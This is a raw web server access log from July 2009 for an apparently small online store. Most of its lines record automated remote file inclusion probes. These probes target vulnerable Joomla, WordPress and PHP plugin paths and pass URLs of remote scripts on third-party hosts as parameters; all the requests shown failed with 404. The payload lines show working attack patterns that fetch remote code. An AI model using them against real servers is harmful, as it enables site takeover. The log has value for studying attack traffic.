65.254.32.2 - - [13/Jul/2009:03:44:15 -0400] "GET /logs/access_log.Q109062700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
87.230.94.131 - - [13/Jul/2009:03:44:42 -0400] "GET /logs/access_log.Q109062700/errors.php?error=http://83.3.132.70/iGeoMap/www//tmp/v6-i.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
87.230.94.131 - - [13/Jul/2009:03:44:42 -0400] "GET /logs/errors.php?error=http://83.3.132.70/iGeoMap/www//tmp/v6-i.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
87.230.94.131 - - [13/Jul/2009:03:44:42 -0400] "GET /errors.php?error=http://83.3.132.70/iGeoMap/www//tmp/v6-i.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
87.230.94.131 - - [13/Jul/2009:03:44:42 -0400] "GET /logs/error_log.Q109062700/errors.php?error=http://83.3.132.70/iGeoMap/www//tmp/v6-i.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
207.182.133.50 - - [13/Jul/2009:03:45:03 -0400] "GET /logs/access_log.Q109062200//com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
207.182.133.50 - - [13/Jul/2009:03:45:03 -0400] "GET /logs/access_log.Q109063000//com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
87.230.76.138 - - [13/Jul/2009:03:45:22 -0400] "GET /logs/access_log.Q109052500//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
87.230.76.138 - - [13/Jul/2009:03:45:23 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
87.230.76.138 - - [13/Jul/2009:03:45:23 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
79.174.68.88 - - [13/Jul/2009:03:45:36 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:03:45:36 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:03:45:36 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:03:46:10 -0400] "GET /logs/access_log.Q109062700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:03:46:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.142.209.134 - - [13/Jul/2009:03:47:17 -0400] "GET /logs/access_log.Q109051400/appserv/main.php?appserv_root=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
91.142.209.134 - - [13/Jul/2009:03:47:17 -0400] "GET /logs/access_log.Q109051400/appserv/main.php?appserv_root=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
91.142.209.134 - - [13/Jul/2009:03:47:17 -0400] "GET /logs/appserv/main.php?appserv_root=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
91.142.209.134 - - [13/Jul/2009:03:47:17 -0400] "GET /appserv/main.php?appserv_root=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
91.142.209.134 - - [13/Jul/2009:03:47:17 -0400] "GET /appserv/main.php?appserv_root=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
91.142.209.134 - - [13/Jul/2009:03:47:17 -0400] "GET /logs/appserv/main.php?appserv_root=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
200.105.207.244 - - [13/Jul/2009:03:47:27 -0400] "GET //login.php?dir=http://id1.fileave.com/id1.txt.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.105.207.244 - - [13/Jul/2009:03:47:27 -0400] "GET /logs//login.php?dir=http://id1.fileave.com/id1.txt.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.105.207.244 - - [13/Jul/2009:03:47:27 -0400] "GET /logs/access_log.Q109061300//login.php?dir=http://id1.fileave.com/id1.txt.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.230.76.138 - - [13/Jul/2009:03:47:52 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 287 "-" "libwww-perl/5.803"
91.142.209.134 - - [13/Jul/2009:03:48:17 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
91.142.209.134 - - [13/Jul/2009:03:48:17 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
210.205.57.2 - - [13/Jul/2009:03:48:37 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:03:48:37 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:03:48:45 -0400] "GET /logs/access_log.Q109061100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:03:48:50 -0400] "GET /logs/access_log.Q109061100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:03:48:54 -0400] "GET /logs/access_log.Q109062700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:03:48:55 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:03:48:55 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:03:48:55 -0400] "GET /logs/access_log.Q109062000%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:03:48:55 -0400] "GET /logs/access_log.Q109052800%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:03:48:56 -0400] "GET /logs/access_log.Q109062700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
85.214.29.182 - - [13/Jul/2009:03:48:59 -0400] "GET /logs/access_log.Q109051500//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.5euroshirts.com/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
91.142.209.134 - - [13/Jul/2009:03:49:08 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
91.142.209.134 - - [13/Jul/2009:03:49:08 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
91.142.209.134 - - [13/Jul/2009:03:49:08 -0400] "GET /logs/access_log.Q109051200//skin/zero_vote/ask_password.php?dir=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
91.142.209.134 - - [13/Jul/2009:03:49:08 -0400] "GET /logs/access_log.Q109051500//skin/zero_vote/ask_password.php?dir=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
91.142.209.134 - - [13/Jul/2009:03:49:08 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
91.142.209.134 - - [13/Jul/2009:03:49:08 -0400] "GET /logs/access_log.Q109051200//skin/zero_vote/ask_password.php?dir=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
91.142.209.134 - - [13/Jul/2009:03:49:08 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
91.142.209.134 - - [13/Jul/2009:03:49:09 -0400] "GET /logs/access_log.Q109051500//skin/zero_vote/ask_password.php?dir=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
210.205.57.2 - - [13/Jul/2009:03:49:25 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:03:49:25 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:03:49:25 -0400] "GET /logs/access_log.Q109062000%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:03:49:25 -0400] "GET /logs/access_log.Q109052800%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
66.249.68.70 - - [13/Jul/2009:03:49:27 -0400] "GET /images/items/0032323_thumb.jpg HTTP/1.1" 200 1487 "-" "Googlebot-Image/1.0"
117.74.99.225 - - [13/Jul/2009:03:49:54 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://www.negozio.com.au/uploaded/cd02uscpoufp7cvs7ktkihqec6/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:03:50:50 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:03:50:50 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:03:50:50 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:03:50:51 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:03:50:51 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:03:50:51 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
66.249.68.247 - - [13/Jul/2009:03:51:14 -0400] "GET /logs/error_log.Q108042300 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
124.0.145.1 - - [13/Jul/2009:03:51:24 -0400] "GET /logs/access_log.Q109062700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:03:51:24 -0400] "GET /logs/access_log.Q109061200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:03:51:36 -0400] "GET /logs/access_log.Q109051800//?path%5Bdocroot%5D=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:03:51:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
116.127.121.39 - - [13/Jul/2009:03:51:48 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:03:52:06 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:03:52:06 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:03:52:06 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:03:52:35 -0400] "GET /logs/access_log.Q109062300%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:03:52:59 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:03:53:18 -0400] "GET /logs/access_log.Q109062300%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
117.47.74.32 - - [13/Jul/2009:03:53:25 -0400] "GET /logs/error_log.Q108083100 HTTP/1.1" 404 223 "http://www.google.com/search?q=87.227.31.168&hl=th&rls=com.microsoft:*:IE-SearchBox&rlz=1I7GGLR&newwindow=1&start=10&sa=N" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; FDM)"
117.47.74.32 - - [13/Jul/2009:03:53:25 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; FDM)"
124.0.139.129 - - [13/Jul/2009:03:53:58 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:03:53:58 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
117.47.74.32 - - [13/Jul/2009:03:53:58 -0400] "GET /logs/error_log.Q108083100 HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; FDM)"
124.0.139.129 - - [13/Jul/2009:03:53:58 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:03:54:17 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:03:54:17 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:03:54:17 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:03:54:21 -0400] "GET /logs/access_log.Q109062700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:03:54:26 -0400] "GET /logs/access_log.Q109062300%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
218.55.213.254 - - [13/Jul/2009:03:54:37 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
218.55.213.254 - - [13/Jul/2009:03:54:37 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
124.0.139.129 - - [13/Jul/2009:03:55:05 -0400] "GET /logs/access_log.Q109062700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:03:55:18 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:03:55:18 -0400] "GET /logs/access_log.Q109061100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:03:55:18 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:03:55:28 -0400] "GET /logs/access_log.Q109062700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
121.2.151.107 - - [13/Jul/2009:03:55:45 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76277 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.2.151.107 - - [13/Jul/2009:03:56:13 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L4128D14C1074E8000341060+M37+ENG HTTP/1.1" 200 59564 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.2.151.107 - - [13/Jul/2009:03:56:15 -0400] "GET /images/items/9600027_THUMB.JPG HTTP/1.1" 200 2613 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L4128D14C1074E8000341060+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.2.151.107 - - [13/Jul/2009:03:56:32 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):Bone%20Tack" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
209.59.12.99 - - [13/Jul/2009:03:56:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.205.57.2 - - [13/Jul/2009:03:56:41 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:03:57:16 -0400] "GET /logs/error_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:03:57:55 -0400] "GET /logs/access_log.Q109061100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:03:58:01 -0400] "GET /logs/access_log.Q109062700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
121.2.151.107 - - [13/Jul/2009:03:58:28 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L3128C84D19C4A800B17106Z+M37+ENG HTTP/1.1" 200 60854 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
91.142.209.134 - - [13/Jul/2009:03:59:02 -0400] "GET /logs/access_log.Q109051200%20//skin/zero_vote/ask_password.php?dir=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
91.142.209.134 - - [13/Jul/2009:03:59:05 -0400] "GET /logs/access_log.Q109051200%20//skin/zero_vote/ask_password.php?dir=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
91.142.209.134 - - [13/Jul/2009:03:59:15 -0400] "GET /logs/error_log.Q109060300%20//skin/zero_vote/ask_password.php?dir=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
91.142.209.134 - - [13/Jul/2009:03:59:16 -0400] "GET /logs/error_log.Q109060300%20//skin/zero_vote/ask_password.php?dir=http://hasan.trakya.edu.tr/images/stories/dg_pictures/idx.txt?%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
87.230.76.138 - - [13/Jul/2009:03:59:48 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
124.0.139.129 - - [13/Jul/2009:03:59:57 -0400] "GET /logs/access_log.Q109061100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:04:00:04 -0400] "GET /logs/access_log.Q109062700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
83.170.112.243 - - [13/Jul/2009:04:00:45 -0400] "GET /phphtml.php?htmlclass_path=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
80.190.200.18 - - [13/Jul/2009:04:00:58 -0400] "GET /logs/error_log.Q109051300/bemarket/postscript/postscript.php?p_mode=http://www.x-pronet.com/board/id.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
80.190.200.18 - - [13/Jul/2009:04:00:58 -0400] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://www.x-pronet.com/board/id.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
80.190.200.18 - - [13/Jul/2009:04:01:24 -0400] "GET /logs/access_log.Q109060700/bemarket/postscript/postscript.php?p_mode=http://www.x-pronet.com/board/id.txt? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
80.247.76.181 - - [13/Jul/2009:04:02:11 -0400] "GET /logs//skin/ggambo7002_board/write.php?dir=http://90plan.ovh.net/~mdatourc//administrator/components/com_joomla-visites/core/ivid.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
80.247.76.181 - - [13/Jul/2009:04:02:11 -0400] "GET //skin/ggambo7002_board/write.php?dir=http://90plan.ovh.net/~mdatourc//administrator/components/com_joomla-visites/core/ivid.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
80.247.76.181 - - [13/Jul/2009:04:02:11 -0400] "GET /logs/access_log.Q109052300//skin/ggambo7002_board/write.php?dir=http://90plan.ovh.net/~mdatourc//administrator/components/com_joomla-visites/core/ivid.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
209.59.12.99 - - [13/Jul/2009:04:02:13 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.247.76.181 - - [13/Jul/2009:04:02:25 -0400] "GET /logs/access_log.Q109051400//skin/ggambo7002_board/write.php?dir=http://90plan.ovh.net/~mdatourc//administrator/components/com_joomla-visites/core/ivid.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
59.22.140.17 - - [13/Jul/2009:04:02:26 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:04:02:26 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
